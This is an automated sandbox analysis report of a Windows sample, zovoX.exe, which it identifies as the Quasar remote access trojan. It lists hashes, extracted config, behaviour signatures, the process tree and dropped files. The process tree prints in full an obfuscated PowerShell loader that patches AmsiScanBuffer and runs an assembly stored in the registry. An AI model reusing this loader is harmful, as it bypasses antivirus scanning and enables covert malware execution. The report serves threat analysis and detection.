Analysis

  • max time kernel
    149s
  • max time network
    102s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    24-12-2024 17:00

General

  • Target

    Compiled/zovoX.exe

  • Size

    2.9MB

  • MD5

    1976cb5215470bbbfe6ea766aa2b9253

  • SHA1

    a9c899dbc512a5e8356731d4b1804fcbe4f6101b

  • SHA256

    dbcc095aa748c9400b3a81781f44dab6cdead04f9abbc5612a49f156c2df3aff

  • SHA512

    d6a904f2b0526435179d6d21b2d4021023451dbce44be4308cc83a6fd9d416be74fac0e4f1734005dc53d466b4dc734086ef97d59a2b6783a6d1f66f646be4b3

  • SSDEEP

    49152:XrCFFGZ0Ta3c4cF5v+kvvlEY4GO5me+90HPjxVBTvI5C8yXHxoAubGS:bC/la3cZ5v+st3OnxHPjRJ1ObT

Malware Config

Extracted

Family

quasar

Attributes
  • encryption_key

    6DC75341715F183F008C5D5A26E1967745A885D9

  • reconnect_delay

    3000

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs

    Clear Windows Event Logs to hide the activity of an intrusion.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Start PowerShell.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 40 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 25 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:648
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:564
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{3e56bfce-726c-4b8f-9283-d3263c96abd5}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1692
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:700
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:996
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
            1⤵
              PID:712
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
              1⤵
                PID:756
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1076
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1084
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                    1⤵
                      PID:1220
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:1248
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:BetvLqzIQfXU{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$mskZeRDtWnqfrJ,[Parameter(Position=1)][Type]$OLRhvfADOC)$kfzmXjndVHv=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Re'+'f'+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+[Char](100)+'Del'+'e'+''+[Char](103)+''+[Char](97)+''+'t'+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+'e'+[Char](109)+''+'o'+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+'d'+'u'+[Char](108)+''+'e'+'',$False).DefineType(''+'M'+''+[Char](121)+'D'+[Char](101)+''+'l'+''+'e'+''+[Char](103)+'at'+'e'+'T'+[Char](121)+'p'+[Char](101)+'',''+'C'+''+[Char](108)+''+'a'+''+'s'+''+'s'+''+[Char](44)+''+'P'+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+''+'l'+''+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+'n'+'s'+'i'+''+'C'+'la'+[Char](115)+''+[Char](115)+','+'A'+'u'+[Char](116)+'o'+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$kfzmXjndVHv.DefineConstructor('R'+[Char](84)+'Sp'+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+'Na'+'m'+''+[Char](101)+''+','+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+'yS'+'i'+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+'li'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$mskZeRDtWnqfrJ).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+'t'+'i'+'m'+[Char](101)+''+[Char](44)+''+'M'+'a'+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+'d'+'');$kfzmXjndVHv.DefineMethod(''+[Char](73)+'n'+[Char](118)+'ok'+[Char](101)+'','P'+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+'c'+',H'+[Char](105)+'d'+[Char](101)+''+'B'+''+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+',Vi'+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$OLRhvfADOC,$mskZeRDtWnqfrJ).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+'t'+'im'+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+'a'+'g'+'e'+'d');Write-Output $kfzmXjndVHv.CreateType();}$ggzAZnEaJoIPE=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+[Char](116)+'e'+'m'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+'c'+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+''+[Char](116)+''+'.'+'W'+'i'+''+[Char](110)+''+[Char](51)+'2'+[Char](46)+''+[Char](85)+''+[Char](110)+''+'s'+'af'+[Char](101)+''+[Char](78)+''+'a'+'t'+'i'+''+[Char](118)+'e'+[Char](77)+''+'e'+''+'t'+''+'h'+'ods');$GyVKHHZojcLTwT=$ggzAZnEaJoIPE.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'P'+''+[Char](114)+''+[Char](111)+''+'c'+''+[Char](65)+''+[Char](100)+''+[Char](100)+''+'r'+''+[Char](101)+''+[Char](115)+'s',[Reflection.BindingFlags](''+'P'+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+'t'+[Char](97)+'ti'+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$SbDpojLmJNvugFJbuSF=BetvLqzIQfXU @([String])([IntPtr]);$GwUtWipjhlmFTNAeeLWLqs=BetvLqzIQfXU @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$HzWcrLbXxKv=$ggzAZnEaJoIPE.GetMethod(''+'G'+''+[Char](101)+''+'t'+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+'n'+'e'+''+[Char](108)+''+'3'+''+[Char](50)+''+'.'+'d'+'l'+''+'l'+'')));$eXhvaismJaGhXU=$GyVKHHZojcLTwT.Invoke($Null,@([Object]$HzWcrLbXxKv,[Object](''+'L'+''+'o'+'a'+'d'+''+[Char](76)+''+'i'+''+'b'+''+[Char](114)+''+[Char](97)+''+'r'+''+'y'+'A')));$ckQmcQBqaYVDpyaSy=$GyVKHHZojcLTwT.Invoke($Null,@([Object]$HzWcrLbXxKv,[Object]('V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+''+[Char](80)+''+[Char](114)+''+'o'+'te'+[Char](99)+'t')));$CKKaiRc=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($eXhvaismJaGhXU,$SbDpojLmJNvugFJbuSF).Invoke(''+[Char](97)+''+[Char](109)+'s'+[Char](105)+'.'+[Char](100)+''+[Char](108)+'l');$ShhVhueMyFfZChNuX=$GyVKHHZojcLTwT.Invoke($Null,@([Object]$CKKaiRc,[Object](''+[Char](65)+''+[Char](109)+'s'+[Char](105)+''+[Char](83)+'c'+[Char](97)+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+'f'+''+[Char](102)+''+'e'+'r')));$ZZoOgnJxUP=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ckQmcQBqaYVDpyaSy,$GwUtWipjhlmFTNAeeLWLqs).Invoke($ShhVhueMyFfZChNuX,[uint32]8,4,[ref]$ZZoOgnJxUP);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$ShhVhueMyFfZChNuX,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ckQmcQBqaYVDpyaSy,$GwUtWipjhlmFTNAeeLWLqs).Invoke($ShhVhueMyFfZChNuX,[uint32]8,0x20,[ref]$ZZoOgnJxUP);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+'TWA'+[Char](82)+''+[Char](69)+'').GetValue('$'+'n'+''+[Char](121)+''+'a'+''+[Char](45)+''+[Char](115)+'t'+[Char](97)+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                        2⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Command and Scripting Interpreter: PowerShell
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:4964
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
                      1⤵
                        PID:1296
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                        1⤵
                          PID:1320
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                          1⤵
                            PID:1408
                          • C:\Windows\System32\svchost.exe
                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                            1⤵
                            • Indicator Removal: Clear Windows Event Logs
                            PID:1432
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                            1⤵
                              PID:1476
                              • C:\Windows\system32\sihost.exe
                                sihost.exe
                                2⤵
                                  PID:2648
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                1⤵
                                  PID:1504
                                • C:\Windows\System32\svchost.exe
                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                  1⤵
                                    PID:1532
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                    1⤵
                                      PID:1736
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                      1⤵
                                        PID:1760
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k NetworkService -p
                                        1⤵
                                          PID:1776
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                          1⤵
                                            PID:1868
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                            1⤵
                                              PID:1952
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              1⤵
                                                PID:2004
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:2024
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                  1⤵
                                                    PID:1836
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                    1⤵
                                                      PID:2056
                                                    • C:\Windows\System32\spoolsv.exe
                                                      C:\Windows\System32\spoolsv.exe
                                                      1⤵
                                                        PID:2120
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                        1⤵
                                                          PID:2288
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                          1⤵
                                                            PID:2396
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                            1⤵
                                                              PID:2556
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                              1⤵
                                                                PID:2564
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k NetworkService -p
                                                                1⤵
                                                                • Modifies data under HKEY_USERS
                                                                • Modifies registry class
                                                                PID:2632
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                1⤵
                                                                  PID:2716
                                                                • C:\Windows\sysmon.exe
                                                                  C:\Windows\sysmon.exe
                                                                  1⤵
                                                                    PID:2724
                                                                  • C:\Windows\System32\svchost.exe
                                                                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                    1⤵
                                                                      PID:2752
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                      1⤵
                                                                        PID:2764
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                        1⤵
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:2772
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                        1⤵
                                                                          PID:2784
                                                                        • C:\Windows\system32\wbem\unsecapp.exe
                                                                          C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                          1⤵
                                                                            PID:3108
                                                                          • C:\Windows\Explorer.EXE
                                                                            C:\Windows\Explorer.EXE
                                                                            1⤵
                                                                            • Modifies Internet Explorer settings
                                                                            • Modifies registry class
                                                                            • Suspicious behavior: GetForegroundWindowSpam
                                                                            • Suspicious use of FindShellTrayWindow
                                                                            • Suspicious use of SendNotifyMessage
                                                                            • Suspicious use of SetWindowsHookEx
                                                                            PID:3360
                                                                            • C:\Users\Admin\AppData\Local\Temp\Compiled\zovoX.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\Compiled\zovoX.exe"
                                                                              2⤵
                                                                              • Drops file in Windows directory
                                                                              • Suspicious use of WriteProcessMemory
                                                                              PID:2624
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Process 'C:\Windows\$nya-onimai3\$nya-Loli.bat'
                                                                                3⤵
                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:2360
                                                                                • C:\Windows\$nya-onimai3\$nya-Loli.bat
                                                                                  "C:\Windows\$nya-onimai3\$nya-Loli.bat"
                                                                                  4⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:2368
                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    5⤵
                                                                                      PID:2924
                                                                                    • C:\Windows\System32\schtasks.exe
                                                                                      "C:\Windows\System32\schtasks.exe" /Delete /TN "$nya-Loli_1" /F
                                                                                      5⤵
                                                                                        PID:2824
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                                                                                        5⤵
                                                                                        • Suspicious use of SetThreadContext
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:3564
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                                                                                          6⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:4296
                                                                                • C:\Windows\system32\taskmgr.exe
                                                                                  "C:\Windows\system32\taskmgr.exe" /0
                                                                                  2⤵
                                                                                  • Checks SCSI registry key(s)
                                                                                  • Modifies registry class
                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                  • Suspicious use of SendNotifyMessage
                                                                                  PID:2952
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                1⤵
                                                                                  PID:3516
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                  1⤵
                                                                                    PID:3548
                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                    1⤵
                                                                                    • Modifies registry class
                                                                                    PID:3936
                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                    1⤵
                                                                                      PID:4016
                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                      1⤵
                                                                                      • Modifies registry class
                                                                                      PID:4052
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
                                                                                      1⤵
                                                                                        PID:4084
                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                        C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
                                                                                        1⤵
                                                                                          PID:4328
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
                                                                                          1⤵
                                                                                            PID:4524
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                            1⤵
                                                                                              PID:2128
                                                                                            • C:\Windows\System32\svchost.exe
                                                                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                              1⤵
                                                                                                PID:2384
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                1⤵
                                                                                                • Modifies data under HKEY_USERS
                                                                                                PID:1768
                                                                                              • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                1⤵
                                                                                                • Drops file in System32 directory
                                                                                                • Modifies data under HKEY_USERS
                                                                                                PID:1052
                                                                                              • C:\Windows\system32\SppExtComObj.exe
                                                                                                C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                1⤵
                                                                                                  PID:1488
                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                  C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                  1⤵
                                                                                                    PID:2972
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                    1⤵
                                                                                                      PID:1940
                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                      1⤵
                                                                                                        PID:2164
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                        1⤵
                                                                                                          PID:5060
                                                                                                        • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                          C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                          1⤵
                                                                                                            PID:4680
                                                                                                          • C:\Windows\system32\DllHost.exe
                                                                                                            C:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}
                                                                                                            1⤵
                                                                                                              PID:2444
                                                                                                            • C:\Windows\system32\BackgroundTransferHost.exe
                                                                                                              "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
                                                                                                              1⤵
                                                                                                              • Modifies registry class
                                                                                                              PID:3064
                                                                                                            • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
                                                                                                              "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
                                                                                                              1⤵
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:1372
                                                                                                            • C:\Windows\System32\rundll32.exe
                                                                                                              C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                              1⤵
                                                                                                                PID:628

                                                                                                              Network

                                                                                                              MITRE ATT&CK Enterprise v15

                                                                                                              Replay Monitor

                                                                                                              Loading Replay Monitor...

                                                                                                              Downloads

                                                                                                              • C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\BackgroundTransferApi\784edc71-a195-4721-a2ab-93c1c77d4f1f.down_data

                                                                                                                Filesize

                                                                                                                555KB

                                                                                                                MD5

                                                                                                                5683c0028832cae4ef93ca39c8ac5029

                                                                                                                SHA1

                                                                                                                248755e4e1db552e0b6f8651b04ca6d1b31a86fb

                                                                                                                SHA256

                                                                                                                855abd360d8a8d6974eba92b70cbd09ce519bc8773439993f9ab37cb6847309e

                                                                                                                SHA512

                                                                                                                aba434bd29be191c823b02ea9b639beb10647bbe7759bbffdaa790dfb1ec2c58d74c525ef11aacda209e4effe322d1d3a07b115446c8914b07a3bce4d8a0e2c3

                                                                                                              • C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749

                                                                                                                Filesize

                                                                                                                290B

                                                                                                                MD5

                                                                                                                00676c1d2bd2d990f1d9144c5f75f891

                                                                                                                SHA1

                                                                                                                aca12b6c5e8dd056725e4eba02aa023729b29344

                                                                                                                SHA256

                                                                                                                b05e838ec67ad7ce427df5bc3bc6e6620b77b87fb51ce83b00718d8aa1e134e7

                                                                                                                SHA512

                                                                                                                69d1125a474625124d1707d3c06d135aa0af124229ba1722604fc36915e619519b4c869db09cc8aa5345bf59db477759e3003d192f98ddc64b9865007556f49a

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gpbtlhit.g3p.ps1

                                                                                                                Filesize

                                                                                                                60B

                                                                                                                MD5

                                                                                                                d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                SHA1

                                                                                                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                SHA256

                                                                                                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                SHA512

                                                                                                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                              • C:\Windows\$nya-onimai3\$nya-Loli.bat

                                                                                                                Filesize

                                                                                                                2.9MB

                                                                                                                MD5

                                                                                                                1976cb5215470bbbfe6ea766aa2b9253

                                                                                                                SHA1

                                                                                                                a9c899dbc512a5e8356731d4b1804fcbe4f6101b

                                                                                                                SHA256

                                                                                                                dbcc095aa748c9400b3a81781f44dab6cdead04f9abbc5612a49f156c2df3aff

                                                                                                                SHA512

                                                                                                                d6a904f2b0526435179d6d21b2d4021023451dbce44be4308cc83a6fd9d416be74fac0e4f1734005dc53d466b4dc734086ef97d59a2b6783a6d1f66f646be4b3

                                                                                                              • memory/564-103-0x000001E151270000-0x000001E15129A000-memory.dmp

                                                                                                                Filesize

                                                                                                                168KB

                                                                                                              • memory/648-69-0x00007FF9C1970000-0x00007FF9C1980000-memory.dmp

                                                                                                                Filesize

                                                                                                                64KB

                                                                                                              • memory/648-67-0x000001D513320000-0x000001D51334A000-memory.dmp

                                                                                                                Filesize

                                                                                                                168KB

                                                                                                              • memory/648-66-0x000001D513320000-0x000001D51334A000-memory.dmp

                                                                                                                Filesize

                                                                                                                168KB

                                                                                                              • memory/648-68-0x000001D513320000-0x000001D51334A000-memory.dmp

                                                                                                                Filesize

                                                                                                                168KB

                                                                                                              • memory/648-58-0x000001D513320000-0x000001D51334A000-memory.dmp

                                                                                                                Filesize

                                                                                                                168KB

                                                                                                              • memory/648-65-0x000001D513320000-0x000001D51334A000-memory.dmp

                                                                                                                Filesize

                                                                                                                168KB

                                                                                                              • memory/648-64-0x000001D513320000-0x000001D51334A000-memory.dmp

                                                                                                                Filesize

                                                                                                                168KB

                                                                                                              • memory/648-59-0x000001D513320000-0x000001D51334A000-memory.dmp

                                                                                                                Filesize

                                                                                                                168KB

                                                                                                              • memory/648-57-0x000001D5132F0000-0x000001D513314000-memory.dmp

                                                                                                                Filesize

                                                                                                                144KB

                                                                                                              • memory/700-85-0x00007FF9C1970000-0x00007FF9C1980000-memory.dmp

                                                                                                                Filesize

                                                                                                                64KB

                                                                                                              • memory/700-73-0x000002751C8F0000-0x000002751C91A000-memory.dmp

                                                                                                                Filesize

                                                                                                                168KB

                                                                                                              • memory/700-81-0x000002751C8F0000-0x000002751C91A000-memory.dmp

                                                                                                                Filesize

                                                                                                                168KB

                                                                                                              • memory/700-80-0x000002751C8F0000-0x000002751C91A000-memory.dmp

                                                                                                                Filesize

                                                                                                                168KB

                                                                                                              • memory/700-84-0x000002751C8F0000-0x000002751C91A000-memory.dmp

                                                                                                                Filesize

                                                                                                                168KB

                                                                                                              • memory/700-79-0x000002751C8F0000-0x000002751C91A000-memory.dmp

                                                                                                                Filesize

                                                                                                                168KB

                                                                                                              • memory/700-78-0x000002751C8F0000-0x000002751C91A000-memory.dmp

                                                                                                                Filesize

                                                                                                                168KB

                                                                                                              • memory/996-99-0x00007FF9C1970000-0x00007FF9C1980000-memory.dmp

                                                                                                                Filesize

                                                                                                                64KB

                                                                                                              • memory/996-94-0x0000027D235C0000-0x0000027D235EA000-memory.dmp

                                                                                                                Filesize

                                                                                                                168KB

                                                                                                              • memory/996-96-0x0000027D235C0000-0x0000027D235EA000-memory.dmp

                                                                                                                Filesize

                                                                                                                168KB

                                                                                                              • memory/996-98-0x0000027D235C0000-0x0000027D235EA000-memory.dmp

